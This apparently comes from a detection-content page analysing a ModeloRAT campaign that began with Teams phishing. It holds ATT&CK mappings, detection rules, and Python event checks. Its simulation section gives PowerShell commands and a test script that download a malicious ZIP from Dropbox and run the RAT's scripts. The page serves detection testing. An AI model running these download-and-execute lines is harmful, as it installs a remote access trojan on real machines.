Dissecting a ModeloRAT Campaign from Teams Phishing to Domain Compromise
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Rapid7 analyzed an intrusion that started with a malicious Microsoft Teams message masquerading as IT support. The attacker used a Dropbox-hosted Python payload to deploy ModeloRAT, escalate privileges through CVE-2023-36036, and steal domain credentials by presenting a fake lock screen to the victim. The campaign showed how quickly an attacker could move from a single compromised endpoint to broader credential theft across the domain by relying on living-off-the-land techniques. The incident also underscores the growing risk posed by collaboration platforms as an initial access vector.
Investigation
The investigation followed the full attack chain from the initial Teams conversation to a PowerShell stager that downloaded a ZIP archive from Dropbox, unpacked a portable Python environment, and launched collector.py and Pmanager.py. ModeloRAT then established HTTP beaconing to several command-and-control servers, carried out host reconnaissance, and used rundll32 to trigger a kernel exploit that granted SYSTEM-level access. Persistence was maintained through a scheduled task, and the attackers deployed additional backdoor components during the intrusion.
Mitigation
Organizations should apply strict controls over external access in Microsoft Teams, monitor for unusual PowerShell and Python activity, block known malicious Dropbox URLs, and ensure systems are patched against CVE-2023-36036. Application control policies that restrict unauthorized rundll32 usage can help reduce exploitation risk. Security teams should also watch for fake lock-screen behavior and other signs of credential-harvesting activity on endpoints.
Response
If this activity is detected, isolate the affected endpoint immediately, revoke the compromised user’s credentials, and reset impacted domain passwords. Investigators should collect full memory captures, including LSASS-related evidence where appropriate, hunt for ModeloRAT artifacts, and remove any malicious scheduled tasks or persistence mechanisms. Teams tenant settings should also be reviewed, and external chat should be disabled if it is not operationally necessary.
graph TB
  %% Class Definitions
  classDef action fill:#ffcccc
  classDef tool fill:#cce5ff
  classDef malware fill:#e6ffcc
  classDef process fill:#ffd9b3
  classDef file fill:#f2e6ff

  %% Action Nodes
  action_phishing["<b>Action</b> – <b>T1566.003 Phishing: Spearphishing via Service</b><br/>Microsoft Teams message impersonating IT support with malicious link."]
  class action_phishing action
  action_impersonation["<b>Action</b> – <b>T1656 Impersonation</b><br/>Fake IT support account crafted to appear legitimate."]
  class action_impersonation action
  action_content_injection["<b>Action</b> – <b>T1659 Content Injection</b><br/>Message contains PowerShell command that starts infection chain."]
  class action_content_injection action
  action_user_execution["<b>Action</b> – <b>T1204 User Execution</b><br/>Victim clicks link or copy-pastes PowerShell stager."]
  class action_user_execution action
  action_software_discovery["<b>Action</b> – <b>T1518 Software Discovery</b><br/>collector.py enumerates installed software, patches and configuration."]
  class action_software_discovery action
  action_security_discovery["<b>Action</b> – <b>T1518.001 Security Software Discovery</b><br/>Script checks for AV processes such as SecurityHealthHost.exe."]
  class action_security_discovery action
  action_system_info["<b>Action</b> – <b>T1082 System Information Discovery</b><br/>systeminfo, whoami and other commands gather host details."]
  class action_system_info action
  action_dll_loading["<b>Action</b> – <b>T1176 Software Extensions</b><br/>rundll32.exe loads malicious DLLs (ssss.dll, com6848.dll)."]
  class action_dll_loading action
  action_priv_esc["<b>Action</b> – <b>T1068 Exploitation for Privilege Escalation</b><br/>Exploit CVE-2023-36036 in cldflt.sys obtains SYSTEM token."]
  class action_priv_esc action
  action_defense_evasion["<b>Action</b> – <b>T1211 Exploitation for Defense Evasion</b><br/>Kernel exploit bypasses security controls."]
  class action_defense_evasion action
  action_persistence_active_setup["<b>Action</b> – <b>T1547.014 Active Setup Persistence</b><br/>Registry keys under SyncRootManager register malicious cloud sync provider."]
  class action_persistence_active_setup action
  action_event_triggered["<b>Action</b> – <b>T1546 Event Triggered Execution</b><br/>Sync provider acts as event-triggered persistence mechanism."]
  class action_event_triggered action
  action_scheduled_task["<b>Action</b> – <b>T1053 Scheduled Task</b><br/>Daily task TempLogA runs internal.py with SYSTEM privileges."]
  class action_scheduled_task action
  action_path_interception["<b>Action</b> – <b>T1574.007 Path Interception</b><br/>Portable Python directory placed early in PATH to ensure execution."]
  class action_path_interception action
  action_c2_http["<b>Action</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/>ModeloRAT communicates with C2 servers over HTTP port 80."]
  class action_c2_http action
  action_nonstandard_port["<b>Action</b> – <b>T1571 Non-Standard Port</b><br/>Additional reverse-shell channels use ports 50508 and 60503."]
  class action_nonstandard_port action
  action_winrm["<b>Action</b> – <b>T1563 Remote Service Session Hijacking</b><br/>Attacker opens WinRM session to second host for tool deployment."]
  class action_winrm action
  action_rdp["<b>Action</b> – <b>T1078.002 Valid Accounts: Domain Accounts</b><br/>Harvested credentials used for RDP logins."]
  class action_rdp action
  action_kerberoasting["<b>Action</b> – <b>T1558.003 Kerberoasting</b><br/>Service-ticket requests generate credential hashes."]
  class action_kerberoasting action
  action_os_credential_dump["<b>Action</b> – <b>T1003 OS Credential Dumping</b><br/>DumpIt.exe captures memory including LSASS."]
  class action_os_credential_dump action
  action_unsecured_credentials["<b>Action</b> – <b>T1552.001 Unsecured Credentials</b><br/>Fake lock-screen DLL logs captured passwords to disk."]
  class action_unsecured_credentials action
  action_window_discovery["<b>Action</b> – <b>T1010 Application Window Discovery</b><br/>Lock-screen replica mimics Windows lock screen to capture input."]
  class action_window_discovery action
  action_bits_job["<b>Action</b> – <b>T1197 BITS Jobs</b><br/>DumpIt downloaded and executed via BITS."]
  class action_bits_job action

  %% Tool / File / Malware Nodes
  tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Executes initial stager command."]
  class tool_powershell tool
  tool_python["<b>Tool</b> – <b>Name</b>: Portable Python (pythonw.exe)<br/><b>Description</b>: Runs collector.py and Pmanager.py."]
  class tool_python tool
  tool_rundll32["<b>Tool</b> – <b>Name</b>: rundll32.exe<br/><b>Description</b>: Loads malicious DLL payloads."]
  class tool_rundll32 tool
  tool_dumpit["<b>Tool</b> – <b>Name</b>: DumpIt.exe<br/><b>Description</b>: Memory acquisition utility."]
  class tool_dumpit tool
  malware_collector["<b>Malware</b> – <b>Name</b>: collector.py<br/><b>Description</b>: Initial Python script that performs discovery and launches further modules."]
  class malware_collector malware
  malware_pmanager["<b>Malware</b> – <b>Name</b>: Pmanager.py (ModeloRAT)<br/><b>Description</b>: Remote access trojan communicating with C2."]
  class malware_pmanager malware
  file_ssss_dll["<b>File</b> – <b>Name</b>: ssss.dll<br/><b>Description</b>: Malicious DLL loaded for escalation."]
  class file_ssss_dll file
  file_com6848_dll["<b>File</b> – <b>Name</b>: com6848.dll<br/><b>Description</b>: Malicious DLL loaded for credential harvesting."]
  class file_com6848_dll file
  file_lockdll["<b>File</b> – <b>Name</b>: lockscreen.dll<br/><b>Description</b>: Fake lock screen that logs passwords."]
  class file_lockdll file

  %% Connections – Attack Flow
  action_phishing -->|uses| action_impersonation
  action_impersonation -->|delivers| action_content_injection
  action_content_injection -->|triggers| action_user_execution
  action_user_execution -->|executes| tool_powershell
  tool_powershell -->|launches| tool_python
  tool_python -->|runs| malware_collector
  tool_python -->|runs| malware_pmanager
  malware_collector -->|performs| action_software_discovery
  malware_collector -->|performs| action_security_discovery
  malware_collector -->|performs| action_system_info
  malware_pmanager -->|loads| tool_rundll32
  tool_rundll32 -->|loads| file_ssss_dll
  tool_rundll32 -->|loads| file_com6848_dll
  file_ssss_dll -->|enables| action_priv_esc
  file_com6848_dll -->|enables| action_priv_esc
  action_priv_esc -->|provides| action_defense_evasion
  action_defense_evasion -->|establishes| action_persistence_active_setup
  action_persistence_active_setup -->|creates| action_event_triggered
  action_event_triggered -->|creates| action_scheduled_task
  action_scheduled_task -->|relies on| action_path_interception
  action_path_interception -->|ensures execution of| malware_pmanager
  malware_pmanager -->|communicates via| action_c2_http
  malware_pmanager -->|uses| action_nonstandard_port
  malware_pmanager -->|opens| action_winrm
  action_winrm -->|facilitates| action_rdp
  action_rdp -->|leverages| action_kerberoasting
  action_kerberoasting -->|provides credentials for| action_os_credential_dump
  action_os_credential_dump -->|executed by| tool_dumpit
  tool_dumpit -->|delivered via| action_bits_job
  action_bits_job -->|supports| action_os_credential_dump
  action_unsecured_credentials -->|implemented by| file_lockdll
  file_lockdll -->|captures via| action_window_discovery
  action_window_discovery -->|writes to| action_unsecured_credentials

  %% Styling
  class action_phishing,action_impersonation,action_content_injection,action_user_execution,action_software_discovery,action_security_discovery,action_system_info,action_dll_loading,action_priv_esc,action_defense_evasion,action_persistence_active_setup,action_event_triggered,action_scheduled_task,action_path_interception,action_c2_http,action_nonstandard_port,action_winrm,action_rdp,action_kerberoasting,action_os_credential_dump,action_unsecured_credentials,action_window_discovery,action_bits_job action
  class tool_powershell,tool_python,tool_rundll32,tool_dumpit tool
  class malware_collector,malware_pmanager malware
  class file_ssss_dll,file_com6848_dll,file_lockdll file
Attack Flow
Detections
- Possible System Enumeration (via cmdline)
- Possible Account or Group Enumeration / Manipulation (via cmdline)
- Schtasks Points to Suspicious Directory / Binary / Script (via cmdline)
- Possible NTLM Credential Leak via Unwanted External UNC Path (via cmdline)
- An Archive Was Extracted To Suspicious Directory Using Powershell (via powershell)
- Possible Active Directory Enumeration with AD Module DirectorySearcher (via powershell)
- IOCs (HashSha256) to detect: When IT Support Calls: Dissecting a ModeloRAT Campaign from Teams to Domain Compromise
- IOCs (SourceIP) to detect: When IT Support Calls: Dissecting a ModeloRAT Campaign from Teams to Domain Compromise
- IOCs (DestinationIP) to detect: When IT Support Calls: Dissecting a ModeloRAT Campaign from Teams to Domain Compromise
- Suspicious Rundll32 Execution for Privilege Escalation and Credential Harvesting [Windows Process Creation]
- PowerShell Download and Execution of Malicious Python Scripts [Windows Powershell]
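The last two rules in the list above cover the process-creation patterns that this chain produces: PowerShell pulling an archive from Dropbox into a user-writable directory, a portable pythonw.exe running a script from that directory, and rundll32 loading a DLL from outside the system directories. As an added illustration (not Rapid7's rule logic or any code from the incident), the following Python applies those three checks to constructed Sysmon-style events; the DLL path under %TEMP% and the user name are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (EventID 1 reduced to
# image + command line); not real telemetry from the incident.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -c iwr -Uri "https://www.dropbox.com/scl/fi/x/a.zip?dl=1" '
                r'-OutFile "C:\Users\u\AppData\Roaming\Winp.zip"; '
                r'Expand-Archive -Path "C:\Users\u\AppData\Roaming\Winp.zip" '
                r'-DestinationPath "C:\Users\u\AppData\Roaming"'},
    {"image": r"C:\Users\u\AppData\Roaming\WPy64-31401\python\pythonw.exe",
     "cmdline": r"pythonw.exe C:\Users\u\AppData\Roaming\WPy64-31401\python\collector.py"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\u\AppData\Local\Temp\ssss.dll,Run"},   # DLL path assumed
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},  # benign
    {"image": r"C:\Program Files\Python312\pythonw.exe",
     "cmdline": r"pythonw.exe C:\Tools\build.py"},                               # benign
]

# Directories a standard user can write to; the dropped payload lives in one of them.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Downloads|Public)\\", re.I)

def ps_download_extract_to_user_dir(ev):
    """PowerShell fetches an archive from Dropbox and expands it into a user-writable path."""
    if "powershell" not in ev["image"].lower():
        return False
    cl = ev["cmdline"]
    downloads = re.search(r"\b(iwr|Invoke-WebRequest|curl|wget)\b.*dropbox\.com", cl, re.I)
    return bool(downloads and re.search(r"Expand-Archive", cl, re.I) and USER_WRITABLE.search(cl))

def pythonw_script_from_user_dir(ev):
    """A windowless interpreter located in a user-writable directory runs a .py script."""
    img = ev["image"]
    return (img.lower().endswith("pythonw.exe") and bool(USER_WRITABLE.search(img))
            and re.search(r"\.py\b", ev["cmdline"], re.I) is not None)

def rundll32_user_writable_dll(ev):
    """rundll32 loads a DLL from a user-writable location instead of a system directory."""
    if not ev["image"].lower().endswith("rundll32.exe"):
        return False
    m = re.search(r'"?([A-Za-z]:\\[^",]+\.dll)"?', ev["cmdline"], re.I)
    return bool(m and USER_WRITABLE.search(m.group(1)))

RULES = {"ps_download_extract": ps_download_extract_to_user_dir,
         "pythonw_user_dir": pythonw_script_from_user_dir,
         "rundll32_user_dll": rundll32_user_writable_dll}

def evaluate(events):
    """Return (event_index, rule_name) pairs for every rule that fires."""
    return [(i, n) for i, ev in enumerate(events) for n, fn in RULES.items() if fn(ev)]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {SAMPLE_EVENTS[idx]['cmdline'][:60]}")
```

The two benign events show the boundary each check relies on: the same binaries running from system or Program Files paths do not fire.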
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
- Initial Drop: The attacker, having obtained a foothold on the victim workstation, launches PowerShell to retrieve a malicious ZIP file hosted on Dropbox. The URL is hard‑coded in the detection rule, so the attacker uses the exact same string to guarantee detection (for validation purposes).
- Extraction: Using the built-in Expand-Archive cmdlet, the archive is unpacked directly into the user’s %APPDATA% folder, a location frequently overlooked by defenders.
- Payload Execution: Two Python scripts, collector.py and Pmanager.py, are executed via pythonw.exe (the “windowless” interpreter) to avoid visible console windows, enabling stealthy persistence and data exfiltration.
Exact commands (must match rule):
# 1. Download the ZIP archive
iwr -Uri "https://www.dropbox.com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1" -OutFile "$env:APPDATA\Winp.zip"

# 2. Extract the archive
Expand-Archive -Path "$env:APPDATA\Winp.zip" -DestinationPath "$env:APPDATA"

# 3. Execute the first Python script
Start-Process "$env:APPDATA\WPy64-31401\python\pythonw.exe" -ArgumentList "$env:APPDATA\WPy64-31401\python\collector.py"

# 4. Execute the second Python script
Start-Process "$env:APPDATA\WPy64-31401\python\pythonw.exe" -ArgumentList "$env:APPDATA\WPy64-31401\python\Pmanager.py"
Regression Test Script:
# -------------------------------------------------
# Regression Test – Mimic ModeloRAT PowerShell workflow
# -------------------------------------------------
$zipUrl      = "https://www.dropbox.com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1"
$zipPath     = "$env:APPDATA\Winp.zip"
$extractPath = $env:APPDATA
$pythonExe   = "$env:APPDATA\WPy64-31401\python\pythonw.exe"
$collector   = "$env:APPDATA\WPy64-31401\python\collector.py"
$pmanager    = "$env:APPDATA\WPy64-31401\python\Pmanager.py"

# Download
Write-Host "[*] Downloading malicious ZIP..."
Invoke-WebRequest -Uri $zipUrl -OutFile $zipPath

# Extract
Write-Host "[*] Extracting archive..."
Expand-Archive -Path $zipPath -DestinationPath $extractPath -Force

# Execute collector.py
Write-Host "[*] Launching collector.py..."
Start-Process -FilePath $pythonExe -ArgumentList $collector

# Execute Pmanager.py
Write-Host "[*] Launching Pmanager.py..."
Start-Process -FilePath $pythonExe -ArgumentList $pmanager

Write-Host "[+] Simulation complete. Verify SIEM for alert."
Cleanup Commands:
# -------------------------------------------------
# Cleanup – Remove artifacts created by the test
# -------------------------------------------------
$zipPath     = "$env:APPDATA\Winp.zip"
$extractRoot = "$env:APPDATA\WPy64-31401"
$pythonExe   = "$env:APPDATA\WPy64-31401\python\pythonw.exe"

# Stop any running pythonw processes from this test
Get-Process -Name pythonw -ErrorAction SilentlyContinue |
    Where-Object { $_.Path -like "*WPy64-31401*" } |
    Stop-Process -Force

# Remove extracted directory
if (Test-Path $extractRoot) { Remove-Item -Recurse -Force $extractRoot }

# Remove the ZIP file
if (Test-Path $zipPath) { Remove-Item -Force $zipPath }

Write-Host "[+] Cleanup complete."